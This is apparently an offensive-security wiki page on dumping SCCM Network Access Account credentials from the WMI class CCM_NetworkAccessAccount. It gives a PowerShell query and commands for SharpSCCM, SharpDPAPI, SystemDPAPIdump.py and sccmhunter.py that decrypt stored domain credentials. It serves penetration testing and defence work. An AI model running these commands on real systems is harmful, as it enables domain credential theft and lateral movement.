Dump currently deployed secrets via WMI
The Netwrok Access Account (NAA) is a domain account provisioned on a site server. The NAA account is used by SCCM clients to download software from the distribution point. Otherwise, it serves no other purpose within the configuration.
The NAA accounts are stored within the CCM_NetworkAccessAccount class located in the WMI namespace root\ccm\policy\Machine\ActualConfig
The class contains two attributes which are effectively stored credential data these are:
- NetworkAccessUsername
- NetworkAccessPassword
These values contains encrypted data for values within them. With local administrative privileges, its possible to utilize tools such as SharpSCCM and SharpDPAPI to decrypt the data blocks and retrieve the credentials for the currently configured NAA.
- Local administrator privileges on an SCCM client
To discover if any NAA credentials are stored locally, the following PowerShell command can be executed.
Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"The following tools can be used to extract this information from the system.
SharpSCCM.exe local secrets -m wmi
.png)
{% code overflow="wrap" %}
SharpDPAPI.exe SCCM{% endcode %}
.png)
python3 SystemDPAPIdump.py -sccm <domain>/<user>:<pass>@<ip>.png)
sccmhunter.py -u <User> -p Password> -target <ip>.png)